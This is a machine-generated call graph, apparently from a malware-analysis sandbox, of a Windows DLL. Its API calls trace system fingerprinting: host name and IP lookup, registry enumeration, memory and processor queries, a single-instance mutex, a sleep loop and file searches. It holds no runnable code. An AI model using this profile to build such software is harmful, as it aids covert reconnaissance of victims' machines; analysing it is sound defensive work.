8523->8524 8525 7ffe11507c50 10 API calls 8524->8525 8526 7ffe115049c5 RegEnumKeyExW 8525->8526 8528 7ffe11504cf1 8526->8528 8529 7ffe11504a31 RegOpenKeyExW 8526->8529 8534 7ffe11507e50 2 API calls 8528->8534 8530 7ffe11504cec 8529->8530 8531 7ffe11504a62 RegQueryValueExW 8529->8531 8530->8496 8532 7ffe11504aa2 8531->8532 8533 7ffe11504ce1 RegCloseKey 8531->8533 8561 7ffe11506890 WideCharToMultiByte 8532->8561 8533->8530 8536 7ffe11504d11 8534->8536 8537 7ffe11507e50 2 API calls 8536->8537 8540 7ffe11504d1b 8537->8540 8538 7ffe11504b31 RegQueryValueExW 8539 7ffe11504b6d 8538->8539 8544 7ffe11504be9 8538->8544 8541 7ffe11506890 4 API calls 8539->8541 8542 7ffe11507e50 2 API calls 8540->8542 8554 7ffe11504b92 8541->8554 8543 7ffe11504d28 8542->8543 8545 7ffe11507e50 2 API calls 8543->8545 8546 7ffe11504c09 RegQueryValueExW 8544->8546 8548 7ffe11504d35 8545->8548 8547 7ffe11504c45 8546->8547 8553 7ffe11504cc1 8546->8553 8549 7ffe11506890 4 API calls 8547->8549 8550 7ffe11507e50 2 API calls 8548->8550 8556 7ffe11504c6a 8549->8556 8550->8513 8551 7ffe11504ac7 8551->8538 8567 7ffe11506980 GetProcessHeap RtlRestoreThreadPreferredUILanguages 8551->8567 8553->8533 8554->8544 8568 7ffe11506980 GetProcessHeap RtlRestoreThreadPreferredUILanguages 8554->8568 8556->8553 8569 7ffe11506980 GetProcessHeap RtlRestoreThreadPreferredUILanguages 8556->8569 8558->8502 8559->8497 8560->8516 8562 7ffe115068e8 8561->8562 8563 7ffe1150693e 8561->8563 8570 7ffe11506950 GetProcessHeap RtlAllocateHeap 8562->8570 8563->8551 8565 7ffe115068f5 8565->8563 8566 7ffe11506902 WideCharToMultiByte 8565->8566 8566->8563 8567->8538 8568->8544 8569->8553 8570->8565 8571 7ffe11509a00 8572 7ffe11509a26 8571->8572 8573 7ffe11509a5d 8572->8573 8574 7ffe11509a3d dllmain_raw 8572->8574 8576 7ffe11509a2e 8572->8576 8573->8576 8577 7ffe11509a70 8573->8577 8578 7ffe11509a78 8573->8578 8575 7ffe11509a50 8574->8575 8574->8576 8595 7ffe11509800 8575->8595 8631 7ffe1150aa54 GetModuleFileNameW 8577->8631 8627 7ffe11501e00 8578->8627 8583 7ffe11509abb 8584 7ffe11509ad4 8583->8584 8585 7ffe11509ac8 8583->8585 8584->8576 8590 7ffe11509800 63 API calls 8584->8590 8639 7ffe1150ab6c GetModuleFileNameW 8585->8639 8586 7ffe11501e00 2 API calls 8588 7ffe11509aa1 8586->8588 8592 7ffe11509800 63 API calls 8588->8592 8591 7ffe11509ae6 8590->8591 8591->8576 8593 7ffe11509af0 dllmain_raw 8591->8593 8594 7ffe11509aae dllmain_raw 8592->8594 8593->8576 8594->8583 8596 7ffe11509841 __scrt_acquire_startup_lock 8595->8596 8597 7ffe11509808 8595->8597 8606 7ffe115099c5 8596->8606 8607 7ffe1150a088 __scrt_fastfail 7 API calls 8596->8607 8618 7ffe1150999a 8596->8618 8598 7ffe11509835 8597->8598 8599 7ffe1150980d 8597->8599 8652 7ffe11509d20 8598->8652 8600 7ffe11509828 __scrt_dllmain_crt_thread_attach 8599->8600 8602 7ffe11509812 8599->8602 8604 7ffe11509826 8600->8604 8603 7ffe11509817 8602->8603 8647 7ffe11509c60 8602->8647 8603->8573 8604->8573 8674 7ffe11509cdc 8606->8674 8607->8606 8609 7ffe115099ca 8679 7ffe11509d0c 8609->8679 8610 7ffe11509872 __scrt_acquire_startup_lock 8612 7ffe1150989e 8610->8612 8623 7ffe11509876 __scrt_release_startup_lock 8610->8623 8660 7ffe1150a088 IsProcessorFeaturePresent 8610->8660 8667 7ffe11509c20 8612->8667 8613 7ffe115099d5 __scrt_release_startup_lock 8684 7ffe11509ef8 8613->8684 8617 7ffe115098ad _RTC_Initialize 8617->8623 8670 7ffe11509f74 8617->8670 8618->8573 8623->8573 8628 7ffe11501e23 CreateThread 8627->8628 8629 7ffe11501e21 8627->8629 8628->8629 8630 7ffe11501e58 FindCloseChangeNotification 8628->8630 8629->8583 8629->8586 8630->8629 8632 7ffe1150aa91 8631->8632 8633 7ffe1150aa9d GetLastError 8632->8633 8637 7ffe1150aaa7 8632->8637 8633->8637 8634 7ffe1150ab4c 8635 7ffe11509540 _handle_error 8 API calls 8634->8635 8636 7ffe1150ab5b 8635->8636 8636->8578 8637->8634 8637->8637 8974 7ffe11501140 8637->8974 8640 7ffe1150aba9 8639->8640 8641 7ffe1150abb5 GetLastError 8640->8641 8645 7ffe1150abbf 8640->8645 8641->8645 8642 7ffe1150ac64 8643 7ffe11509540 _handle_error 8 API calls 8642->8643 8644 7ffe11509ad0 8643->8644 8644->8584 8645->8642 8646 7ffe11501140 5 API calls 8645->8646 8646->8642 8688 7ffe1150e3a4 8647->8688 8653 7ffe11509d42 8652->8653 8855 7ffe1150aeb4 8653->8855 8655 7ffe11509d47 8656 7ffe11509d4b 8655->8656 8863 7ffe1150e37c 8655->8863 8656->8610 8661 7ffe1150a0ad memcpy_s 8660->8661 8662 7ffe1150a0c9 RtlCaptureContext RtlLookupFunctionEntry 8661->8662 8663 7ffe1150a12e memcpy_s 8662->8663 8664 7ffe1150a0f2 RtlVirtualUnwind 8662->8664 8665 7ffe1150a160 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 8663->8665 8664->8663 8666 7ffe1150a1b2 8665->8666 8666->8612 8934 7ffe11509d6c 8667->8934 8669 7ffe11509c2b 8669->8617 8939 7ffe11509f24 8670->8939 8672 7ffe115098c2 8673 7ffe1150a038 InitializeSListHead 8672->8673 8675 7ffe11509ce5 __scrt_acquire_startup_lock 8674->8675 8677 7ffe11509cf9 8675->8677 8954 7ffe1150ddf4 8675->8954 8677->8609 8962 7ffe1150e3c8 8679->8962 8682 7ffe1150b76c __vcrt_uninitialize_ptd 6 API calls 8683 7ffe1150af49 8682->8683 8683->8613 8686 7ffe11509f09 __scrt_uninitialize_crt 8684->8686 8685 7ffe11509f1b 8685->8618 8686->8685 8687 7ffe1150af14 __scrt_uninitialize_crt 8 API calls 8686->8687 8687->8685 8694 7ffe1150f948 8688->8694 8691 7ffe1150af00 8827 7ffe1150b624 8691->8827 8695 7ffe11509c69 8694->8695 8696 7ffe1150f959 8694->8696 8695->8691 8704 7ffe1151105c 8696->8704 8746 7ffe11510e0c 8704->8746 8707 7ffe1151109e TlsGetValue 8708 7ffe1150f95e 8707->8708 8708->8695 8709 7ffe115110b4 8708->8709 8710 7ffe11510e0c __crtLCMapStringW 5 API calls 8709->8710 8711 7ffe115110e7 8710->8711 8712 7ffe11511101 TlsSetValue 8711->8712 8713 7ffe1150f973 8711->8713 8712->8713 8714 7ffe1150f7e8 8713->8714 8715 7ffe1150f832 8714->8715 8716 7ffe1150f82a 8714->8716 8718 7ffe1150e400 __free_lconv_num 15 API calls 8715->8718 8717 7ffe1150e400 __free_lconv_num 15 API calls 8716->8717 8717->8715 8719 7ffe1150f83f 8718->8719 8720 7ffe1150e400 __free_lconv_num 15 API calls 8719->8720 8721 7ffe1150f84c 8720->8721 8722 7ffe1150e400 __free_lconv_num 15 API calls 8721->8722 8723 7ffe1150f859 8722->8723 8724 7ffe1150e400 __free_lconv_num 15 API calls 8723->8724 8725 7ffe1150f866 8724->8725 8726 7ffe1150e400 __free_lconv_num 15 API calls 8725->8726 8727 7ffe1150f873 8726->8727 8728 7ffe1150e400 __free_lconv_num 15 API calls 8727->8728 8729 7ffe1150f880 8728->8729 8730 7ffe1150e400 __free_lconv_num 15 API calls 8729->8730 8731 7ffe1150f88d 8730->8731 8732 7ffe1150e400 __free_lconv_num 15 API calls 8731->8732 8733 7ffe1150f89d 8732->8733 8734 7ffe1150e400 __free_lconv_num 15 API calls 8733->8734 8735 7ffe1150f8ad 8734->8735 8755 7ffe1150f5d0 8735->8755 8747 7ffe11510e6d 8746->8747 8751 7ffe11510e68 8746->8751 8747->8707 8747->8708 8748 7ffe11510f1a 8748->8747 8750 7ffe11510f28 GetProcAddress 8748->8750 8749 7ffe11510e95 LoadLibraryExW 8749->8751 8752 7ffe11510eb6 GetLastError 8749->8752 8750->8747 8751->8747 8751->8748 8751->8749 8754 7ffe11510eff FreeLibrary 8751->8754 8752->8751 8753 7ffe11510ec1 LoadLibraryExW 8752->8753 8753->8751 8754->8751 8769 7ffe11510d9c EnterCriticalSection 8755->8769 8828 7ffe1150b638 8827->8828 8829 7ffe11509c6e 8827->8829 8832 7ffe1150b642 8828->8832 8835 7ffe1150b3e0 8828->8835 8829->8604 8840 7ffe1150b434 8832->8840 8833 7ffe1150b652 8833->8829 8834 7ffe1150e400 __free_lconv_num 15 API calls 8833->8834 8834->8829 8845 7ffe1150af7c 8835->8845 8838 7ffe1150b421 TlsGetValue 8839 7ffe1150b413 8838->8839 8839->8832 8841 7ffe1150af7c try_get_function 5 API calls 8840->8841 8842 7ffe1150b467 8841->8842 8843 7ffe1150b480 TlsSetValue 8842->8843 8844 7ffe1150b46f 8842->8844 8843->8844 8844->8833 8846 7ffe1150afe2 8845->8846 8849 7ffe1150afdd 8845->8849 8846->8838 8846->8839 8847 7ffe1150b0aa 8847->8846 8850 7ffe1150b0b9 GetProcAddress 8847->8850 8848 7ffe1150b015 LoadLibraryExW 8848->8849 8851 7ffe1150b03b GetLastError 8848->8851 8849->8846 8849->8847 8849->8848 8854 7ffe1150b088 FreeLibrary 8849->8854 8850->8846 8852 7ffe1150b0d1 8850->8852 8851->8849 8853 7ffe1150b046 LoadLibraryExW 8851->8853 8852->8846 8853->8849 8854->8849 8856 7ffe1150aebd __vcrt_initialize_pure_virtual_call_handler 8855->8856 8876 7ffe1150b790 8856->8876 8861 7ffe1150aecb 8861->8655 8864 7ffe115126a8 8863->8864 8865 7ffe11509d54 8864->8865 8912 7ffe11510c14 8864->8912 8865->8656 8867 7ffe1150af14 8865->8867 8924 7ffe1150ac98 8867->8924 8870 7ffe1150af36 8870->8656 8871 7ffe1150b76c __vcrt_uninitialize_ptd 6 API calls 8872 7ffe1150af2a 8871->8872 8873 7ffe1150b7d8 __vcrt_uninitialize_locks DeleteCriticalSection 8872->8873 8874 7ffe1150af2f 8873->8874 8927 7ffe1150b54c 8874->8927 8877 7ffe1150b798 8876->8877 8879 7ffe1150b7c9 8877->8879 8881 7ffe1150aec7 8877->8881 8893 7ffe1150b49c 8877->8893 8880 7ffe1150b7d8 __vcrt_uninitialize_locks DeleteCriticalSection 8879->8880 8880->8881 8881->8861 8882 7ffe1150b72c 8881->8882 8898 7ffe1150b338 8882->8898 8884 7ffe1150b73c 8885 7ffe1150b434 __vcrt_FlsSetValue 6 API calls 8884->8885 8888 7ffe1150aed4 8884->8888 8886 7ffe1150b759 8885->8886 8886->8888 8903 7ffe1150b76c 8886->8903 8888->8861 8889 7ffe1150b7d8 8888->8889 8890 7ffe1150b803 8889->8890 8891 7ffe1150b7e6 DeleteCriticalSection 8890->8891 8892 7ffe1150b807 8890->8892 8891->8890 8892->8861 8894 7ffe1150af7c try_get_function 5 API calls 8893->8894 8895 7ffe1150b4d7 8894->8895 8896 7ffe1150b4f3 InitializeCriticalSectionAndSpinCount 8895->8896 8897 7ffe1150b4df 8895->8897 8896->8897 8897->8877 8899 7ffe1150af7c try_get_function 5 API calls 8898->8899 8900 7ffe1150b364 8899->8900 8901 7ffe1150b37b TlsAlloc 8900->8901 8902 7ffe1150b36c 8900->8902 8901->8902 8902->8884 8904 7ffe1150b780 8903->8904 8905 7ffe1150b77b 8903->8905 8904->8888 8907 7ffe1150b38c 8905->8907 8908 7ffe1150af7c try_get_function 5 API calls 8907->8908 8909 7ffe1150b3b7 8908->8909 8910 7ffe1150b3cd TlsFree 8909->8910 8911 7ffe1150b3bf 8909->8911 8910->8911 8911->8904 8923 7ffe11510d9c EnterCriticalSection 8912->8923 8914 7ffe11510c24 8915 7ffe115157b0 33 API calls 8914->8915 8916 7ffe11510c2d 8915->8916 8917 7ffe11510a2c 35 API calls 8916->8917 8922 7ffe11510c3b 8916->8922 8919 7ffe11510c36 8917->8919 8918 7ffe11510df0 abort LeaveCriticalSection 8920 7ffe11510c47 8918->8920 8921 7ffe11510b18 GetStdHandle GetFileType 8919->8921 8920->8864 8921->8922 8922->8918 8931 7ffe1150b24c 8924->8931 8926 7ffe1150aca8 8926->8870 8926->8871 8928 7ffe1150b584 8927->8928 8929 7ffe1150b550 8927->8929 8928->8870 8929->8928 8930 7ffe1150b56a FreeLibrary 8929->8930 8930->8929 8932 7ffe1150af7c try_get_function 5 API calls 8931->8932 8933 7ffe1150b278 8932->8933 8933->8926 8935 7ffe11509e2a 8934->8935 8938 7ffe11509d84 __scrt_initialize_onexit_tables __scrt_acquire_startup_lock 8934->8938 8936 7ffe1150a088 __scrt_fastfail 7 API calls 8935->8936 8937 7ffe11509e34 8936->8937 8938->8669 8940 7ffe11509f53 8939->8940 8942 7ffe11509f49 _onexit 8939->8942 8943 7ffe1150e1fc 8940->8943 8942->8672 8946 7ffe1150ddb8 8943->8946 8953 7ffe11510d9c EnterCriticalSection 8946->8953 8961 7ffe11510d9c EnterCriticalSection 8954->8961 8965 7ffe1150fafc 8962->8965 8966 7ffe11509d17 8965->8966 8967 7ffe1150fb0b 8965->8967 8966->8682 8969 7ffe11511004 8967->8969 8970 7ffe11510e0c __crtLCMapStringW 5 API calls 8969->8970 8971 7ffe1151102f 8970->8971 8972 7ffe11511046 TlsFree 8971->8972 8973 7ffe11511037 8971->8973 8972->8973 8973->8966 8977 7ffe1150b2a0 8974->8977 8976 7ffe115011d5 8976->8634 8978 7ffe1150af7c try_get_function 5 API calls 8977->8978 8979 7ffe1150b2e4 8978->8979 8979->8976 9009 7ffe11501ea0 9012 7ffe11501f00 9009->9012 9013 7ffe11501f04 9012->9013 9014 7ffe11501f0d SleepEx 9013->9014 9015 7ffe11501ebd 9013->9015 9014->9013 9904 7ffe1150551e 9913 7ffe11503a70 9904->9913 9907 7ffe115055da 9908 7ffe11501f20 39 API calls 9909 7ffe115055b9 9908->9909 9910 7ffe115055d0 9909->9910 9947 7ffe11506980 GetProcessHeap RtlRestoreThreadPreferredUILanguages 9909->9947 9948 7ffe11506980 GetProcessHeap RtlRestoreThreadPreferredUILanguages 9910->9948 9914 7ffe11503ad1 wcscpy 9913->9914 9915 7ffe11503ae5 WSAStartup 9914->9915 9916 7ffe11503bad 9915->9916 9917 7ffe11503b07 gethostname 9915->9917 9918 7ffe11507d50 10 API calls 9916->9918 9919 7ffe11503ba7 WSACleanup 9917->9919 9920 7ffe11503b23 gethostbyname 9917->9920 9921 7ffe11503bb9 RegOpenKeyExW 9918->9921 9919->9916 9920->9919 9926 7ffe11503b3e memcpy_s 9920->9926 9922 7ffe11503d1d 9921->9922 9923 7ffe11503bf4 9921->9923 9924 7ffe11507e50 2 API calls 9922->9924 9925 7ffe11507d50 10 API calls 9923->9925 9927 7ffe11503d2a GlobalMemoryStatusEx 9924->9927 9928 7ffe11503c00 9925->9928 9926->9919 9929 7ffe11503b89 inet_ntoa 9926->9929 9930 7ffe11503d47 9927->9930 9931 7ffe11503c19 RegEnumKeyExW 9928->9931 9935 7ffe11503cd8 9928->9935 9932 7ffe11503ba3 9929->9932 9933 7ffe11506890 4 API calls 9930->9933 9934 7ffe11503c6c RegOpenKeyExW 9931->9934 9931->9935 9932->9919 9937 7ffe11503d6a 9933->9937 9934->9928 9938 7ffe11503c9c RegQueryValueExW 9934->9938 9936 7ffe11507e50 2 API calls 9935->9936 9939 7ffe11503d0f RegCloseKey 9936->9939 9940 7ffe11503f3f 9937->9940 9949 7ffe11506950 GetProcessHeap RtlAllocateHeap 9937->9949 9938->9935 9941 7ffe11503cf2 RegCloseKey 9938->9941 9939->9922 9942 7ffe11509540 _handle_error 8 API calls 9940->9942 9941->9928 9944 7ffe11503f57 9942->9944 9944->9907 9944->9908 9946 7ffe11503d85 9950 7ffe11506980 GetProcessHeap RtlRestoreThreadPreferredUILanguages 9946->9950 9947->9910 9948->9907 9949->9946 9950->9940 10811 7ffe115109e4 10812 7ffe11510a25 10811->10812 10813 7ffe115109fa 10811->10813 10819 7ffe11510d9c EnterCriticalSection 10813->10819 10820 7ffe115049d4 10821 7ffe115049de RegEnumKeyExW 10820->10821 10822 7ffe11504cf1 10821->10822 10823 7ffe11504a31 RegOpenKeyExW 10821->10823 10828 7ffe11507e50 2 API calls 10822->10828 10824 7ffe11504cec 10823->10824 10825 7ffe11504a62 RegQueryValueExW 10823->10825 10826 7ffe11504aa2 10825->10826 10827 7ffe11504ce1 RegCloseKey 10825->10827 10829 7ffe11506890 4 API calls 10826->10829 10827->10824 10830 7ffe11504d11 10828->10830 10845 7ffe11504ac7 10829->10845 10831 7ffe11507e50 2 API calls 10830->10831 10834 7ffe11504d1b 10831->10834 10832 7ffe11504b31 RegQueryValueExW 10833 7ffe11504b6d 10832->10833 10838 7ffe11504be9 10832->10838 10835 7ffe11506890 4 API calls 10833->10835 10836 7ffe11507e50 2 API calls 10834->10836 10854 7ffe11504b92 10835->10854 10837 7ffe11504d28 10836->10837 10839 7ffe11507e50 2 API calls 10837->10839 10840 7ffe11504c09 RegQueryValueExW 10838->10840 10842 7ffe11504d35 10839->10842 10841 7ffe11504c45 10840->10841 10848 7ffe11504cc1 10840->10848 10843 7ffe11506890 4 API calls 10841->10843 10844 7ffe11507e50 2 API calls 10842->10844 10856 7ffe11504c6a 10843->10856 10846 7ffe11504d42 RegCloseKey 10844->10846 10845->10832 10858 7ffe11506980 GetProcessHeap RtlRestoreThreadPreferredUILanguages 10845->10858 10849 7ffe11504d50 10846->10849 10848->10827 10850 7ffe11507e50 2 API calls 10849->10850 10851 7ffe11504d5d 10850->10851 10852 7ffe11509540 _handle_error 8 API calls 10851->10852 10853 7ffe11504d72 10852->10853 10854->10838 10859 7ffe11506980 GetProcessHeap RtlRestoreThreadPreferredUILanguages 10854->10859 10856->10848 10860 7ffe11506980 GetProcessHeap RtlRestoreThreadPreferredUILanguages 10856->10860 10858->10832 10859->10838 10860->10848 9016 7ffe11501ed0 9019 7ffe11501c50 9016->9019 9039 7ffe11501a80 9019->9039 9026 7ffe11501c99 9027 7ffe115019c0 16 API calls 9026->9027 9030 7ffe11501c9e 9027->9030 9033 7ffe11501ca8 9030->9033 9037 7ffe11501b70 15 API calls 9030->9037 9031 7ffe11501c72 9034 7ffe11501c97 9031->9034 9079 7ffe115019c0 9031->9079 9033->9034 9038 7ffe11505000 150 API calls 9033->9038 9035 7ffe11501c8d 9103 7ffe11505000 9035->9103 9037->9033 9038->9034 9040 7ffe11501abd 9039->9040 9041 7ffe11501aea 9039->9041 9042 7ffe11507d50 10 API calls 9040->9042 9043 7ffe11501b28 GetTempPathW 9041->9043 9044 7ffe11501af4 9041->9044 9047 7ffe11501ac9 LoadLibraryW 9042->9047 9045 7ffe11501b3c 9043->9045 9046 7ffe11501b46 9043->9046 9048 7ffe11507c50 10 API calls 9044->9048 9123 7ffe115015b0 9045->9123 9051 7ffe11509540 _handle_error 8 API calls 9046->9051 9052 7ffe11507e50 2 API calls 9047->9052 9049 7ffe11501b00 GetProcAddress 9048->9049 9053 7ffe11507e50 2 API calls 9049->9053 9054 7ffe11501b5e 9051->9054 9052->9041 9053->9043 9054->9031 9055 7ffe11501540 SHGetFolderPathW 9054->9055 9056 7ffe11501582 9055->9056 9057 7ffe1150158c 9055->9057 9058 7ffe115015b0 59 API calls 9056->9058 9059 7ffe11509540 _handle_error 8 API calls 9057->9059 9058->9057 9060 7ffe115015a4 9059->9060 9060->9031 9061 7ffe11501830 9060->9061 9062 7ffe11507d50 10 API calls 9061->9062 9063 7ffe1150186f RegOpenKeyExW 9062->9063 9064 7ffe11501991 9063->9064 9065 7ffe115018a1 9063->9065 9066 7ffe11507e50 2 API calls 9064->9066 9067 7ffe11507d50 10 API calls 9065->9067 9068 7ffe1150199b 9066->9068 9074 7ffe115018ad 9067->9074 9069 7ffe11509540 _handle_error 8 API calls 9068->9069 9071 7ffe115019af 9069->9071 9070 7ffe115018c6 RegEnumKeyExW 9072 7ffe1150197c 9070->9072 9073 7ffe1150190f RegOpenKeyExW 9070->9073 9071->9031 9076 7ffe11507e50 2 API calls 9072->9076 9073->9074 9075 7ffe11501936 RegQueryValueExW 9073->9075 9074->9070 9078 7ffe1150196c RegCloseKey 9074->9078 9075->9074 9075->9078 9077 7ffe11501986 RegCloseKey 9076->9077 9077->9064 9078->9074 9080 7ffe11507d50 10 API calls 9079->9080 9081 7ffe115019ed GetModuleHandleW 9080->9081 9082 7ffe11507e50 2 API calls 9081->9082 9083 7ffe11501a0c 9082->9083 9084 7ffe11507c50 10 API calls 9083->9084 9085 7ffe11501a18 GetProcAddress 9084->9085 9086 7ffe11507e50 2 API calls 9085->9086 9087 7ffe11501a3c 9086->9087 9088 7ffe11501a57 GetSystemInfo 9087->9088 9089 7ffe11501a44 GetNativeSystemInfo 9087->9089 9090 7ffe11501a6a 9088->9090 9089->9090 9090->9026 9091 7ffe11501b70 9090->9091 9092 7ffe11507d50 10 API calls 9091->9092 9093 7ffe11501baf GetModuleHandleW 9092->9093 9094 7ffe11507e50 2 API calls 9093->9094 9095 7ffe11501bce 9094->9095 9096 7ffe11507c50 10 API calls 9095->9096 9097 7ffe11501bda GetProcAddress 9096->9097 9098 7ffe11507e50 2 API calls 9097->9098 9099 7ffe11501bfe GlobalMemoryStatusEx 9098->9099 9100 7ffe11501c13 9099->9100 9101 7ffe11509540 _handle_error 8 API calls 9100->9101 9102 7ffe11501c3a 9101->9102 9102->9026 9102->9035 9104 7ffe11507d50 10 API calls 9103->9104 9105 7ffe11505033 SetLastError CreateMutexW 9104->9105 9106 7ffe115050bd 9105->9106 9107 7ffe1150505c GetLastError 9105->9107 9108 7ffe11507e50 2 API calls 9106->9108 9109 7ffe11505069 9107->9109 9110 7ffe115050a3 9107->9110 9112 7ffe115050c7 9108->9112 9113 7ffe11507d50 10 API calls 9109->9113 9485 7ffe11505d10 9110->9485 9112->9034 9115 7ffe11505075 9113->9115 9114 7ffe115050b2 CloseHandle 9114->9106 9495 7ffe11509260 9115->9495 9117 7ffe11505084 9118 7ffe11505088 9117->9118 9119 7ffe11505097 9117->9119 9120 7ffe11505d10 146 API calls 9118->9120 9121 7ffe11507e50 2 API calls 9119->9121 9120->9119 9122 7ffe115050a1 9121->9122 9122->9114 9124 7ffe1150164c 9123->9124 9125 7ffe1150161f 9123->9125 9126 7ffe1150168a 9124->9126 9127 7ffe11501656 9124->9127 9128 7ffe11507d50 10 API calls 9125->9128 9130 7ffe115016c8 9126->9130 9131 7ffe11501694 9126->9131 9129 7ffe11507c50 10 API calls 9127->9129 9132 7ffe1150162b LoadLibraryW 9128->9132 9133 7ffe11501662 GetProcAddress 9129->9133 9135 7ffe11501706 9130->9135 9136 7ffe115016d2 9130->9136 9134 7ffe11507c50 10 API calls 9131->9134 9137 7ffe11507e50 2 API calls 9132->9137 9138 7ffe11507e50 2 API calls 9133->9138 9139 7ffe115016a0 GetProcAddress 9134->9139 9141 7ffe11507d50 10 API calls 9135->9141 9140 7ffe11507c50 10 API calls 9136->9140 9137->9124 9138->9126 9143 7ffe11507e50 2 API calls 9139->9143 9144 7ffe115016de GetProcAddress 9140->9144 9142 7ffe11501712 9141->9142 9164 7ffe11501cc0 9142->9164 9143->9130 9146 7ffe11507e50 2 API calls 9144->9146 9146->9135 9148 7ffe11507e50 2 API calls 9149 7ffe11501740 FindFirstFileW 9148->9149 9150 7ffe11501806 9149->9150 9151 7ffe11501764 9149->9151 9153 7ffe11509540 _handle_error 8 API calls 9150->9153 9152 7ffe11507d50 10 API calls 9151->9152 9154 7ffe11501770 9152->9154 9155 7ffe1150181a 9153->9155 9156 7ffe11507d50 10 API calls 9154->9156 9155->9046 9161 7ffe11501781 9156->9161 9157 7ffe115017d3 FindNextFileW 9158 7ffe115017e7 9157->9158 9157->9161 9159 7ffe11507e50 2 API calls 9158->9159 9160 7ffe115017f1 9159->9160 9162 7ffe11507e50 2 API calls 9160->9162 9161->9157 9163 7ffe115017fb FindClose 9162->9163 9163->9150 9167 7ffe115014d0 9164->9167 9168 7ffe115014ed __scrt_initialize_default_local_stdio_options 9167->9168 9171 7ffe1150cc18 9168->9171 9172 7ffe1150cc5e 9171->9172 9173 7ffe1150cc76 9171->9173 9174 7ffe1150f22c _set_errno_from_matherr 15 API calls 9172->9174 9173->9172 9175 7ffe1150cc80 9173->9175 9177 7ffe1150cc63 9174->9177 9201 7ffe1150bb4c 9175->9201 9198 7ffe1150eedc 9177->9198 9178 7ffe1150cc91 memcpy_s 9209 7ffe1150bacc 9178->9209 9180 7ffe11509540 _handle_error 8 API calls 9181 7ffe11501518 9180->9181 9181->9148 9186 7ffe1150cd3c 9189 7ffe1150cd94 9186->9189 9190 7ffe1150cdba 9186->9190 9191 7ffe1150cd4b 9186->9191 9194 7ffe1150cd42 9186->9194 9187 7ffe1150cd0d 9188 7ffe1150e400 __free_lconv_num 15 API calls 9187->9188 9197 7ffe1150cc6e 9188->9197 9195 7ffe1150e400 __free_lconv_num 15 API calls 9189->9195 9190->9189 9192 7ffe1150cdc4 9190->9192 9193 7ffe1150e400 __free_lconv_num 15 API calls 9191->9193 9196 7ffe1150e400 __free_lconv_num 15 API calls 9192->9196 9193->9197 9194->9189 9194->9191 9195->9197 9196->9197 9197->9180 9227 7ffe1150ee34 9198->9227 9202 7ffe1150bb62 9201->9202 9203 7ffe1150bb67 9201->9203 9202->9178 9203->9202 9246 7ffe1150f98c GetLastError 9203->9246 9205 7ffe1150bb84 9266 7ffe1150fb20 9205->9266 9210 7ffe1150f22c _set_errno_from_matherr 15 API calls 9209->9210 9211 7ffe1150bb3e 9210->9211 9212 7ffe1150bccc 9211->9212 9213 7ffe1150bcf3 9212->9213 9214 7ffe1150bd0b 9212->9214 9215 7ffe1150f22c _set_errno_from_matherr 15 API calls 9213->9215 9214->9213 9223 7ffe1150bd11 9214->9223 9216 7ffe1150bcf8 9215->9216 9217 7ffe1150eedc _invalid_parameter_noinfo 32 API calls 9216->9217 9222 7ffe1150bd03 9217->9222 9218 7ffe1150bf31 9219 7ffe1150f22c _set_errno_from_matherr 15 API calls 9218->9219 9220 7ffe1150bf36 9219->9220 9221 7ffe1150eedc _invalid_parameter_noinfo 32 API calls 9220->9221 9221->9222 9222->9186 9222->9187 9223->9218 9223->9222 9333 7ffe1150c0ec 9223->9333 9351 7ffe1150bf48 9223->9351 9375 7ffe1150bc4c 9223->9375 9228 7ffe1150fa20 _invalid_parameter_noinfo 15 API calls 9227->9228 9229 7ffe1150ee5e 9228->9229 9234 7ffe1150eefc IsProcessorFeaturePresent 9229->9234 9235 7ffe1150ef0e 9234->9235 9238 7ffe1150ecd0 9235->9238 9239 7ffe1150ed0a memcpy_s abort 9238->9239 9240 7ffe1150ed32 RtlCaptureContext RtlLookupFunctionEntry 9239->9240 9241 7ffe1150eda2 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 9240->9241 9242 7ffe1150ed6c RtlVirtualUnwind 9240->9242 9243 7ffe1150edf4 abort 9241->9243 9242->9241 9244 7ffe11509540 _handle_error 8 API calls 9243->9244 9245 7ffe1150ee13 GetCurrentProcess TerminateProcess 9244->9245 9247 7ffe1150f9a9 9246->9247 9250 7ffe1150f9ae 9246->9250 9248 7ffe1151105c _invalid_parameter_noinfo 6 API calls 9247->9248 9248->9250 9249 7ffe1150e558 __vcrt_getptd_noexit 15 API calls 9251 7ffe1150f9c5 9249->9251 9250->9249 9252 7ffe1150f9f7 9250->9252 9253 7ffe1150f9cd 9251->9253 9256 7ffe115110b4 _invalid_parameter_noinfo 6 API calls 9251->9256 9254 7ffe1150fa12 SetLastError 9252->9254 9255 7ffe1150f9fc SetLastError 9252->9255 9258 7ffe1150e400 __free_lconv_num 15 API calls 9253->9258 9274 7ffe1150e500 9254->9274 9255->9205 9259 7ffe1150f9e4 9256->9259 9261 7ffe1150f9d4 9258->9261 9259->9253 9262 7ffe1150f9eb 9259->9262 9261->9254 9263 7ffe1150f6f8 _invalid_parameter_noinfo 15 API calls 9262->9263 9264 7ffe1150f9f0 9263->9264 9265 7ffe1150e400 __free_lconv_num 15 API calls 9264->9265 9265->9252 9267 7ffe1150fb35 9266->9267 9268 7ffe1150bba8 9266->9268 9267->9268 9309 7ffe115134cc 9267->9309 9270 7ffe1150fb54 9268->9270 9271 7ffe1150fb69 9270->9271 9273 7ffe1150fb7c 9270->9273 9271->9273 9321 7ffe115120c0 9271->9321 9273->9202 9283 7ffe11512850 9274->9283 9277 7ffe1150e518 9279 7ffe1150e521 IsProcessorFeaturePresent 9277->9279 9281 7ffe1150e54a abort 9277->9281 9280 7ffe1150e52f 9279->9280 9282 7ffe1150ecd0 abort 14 API calls 9280->9282 9282->9281 9284 7ffe11512808 abort EnterCriticalSection LeaveCriticalSection 9283->9284 9285 7ffe1150e509 9284->9285 9285->9277 9286 7ffe115128a0 9285->9286 9287 7ffe115128cd 9286->9287 9289 7ffe1151294a 9286->9289 9288 7ffe1150fa20 _invalid_parameter_noinfo 15 API calls 9287->9288 9287->9289 9292 7ffe115128e5 9287->9292 9288->9292 9290 7ffe11510d9c abort EnterCriticalSection 9289->9290 9294 7ffe115129b2 9289->9294 9290->9294 9291 7ffe11512901 9291->9277 9292->9289 9292->9291 9293 7ffe115128f2 9292->9293 9296 7ffe1150f22c _set_errno_from_matherr 15 API calls 9293->9296 9299 7ffe11510df0 abort LeaveCriticalSection 9294->9299 9300 7ffe115129fb abort 9294->9300 9304 7ffe11512a49 9294->9304 9295 7ffe11512abc 9295->9291 9303 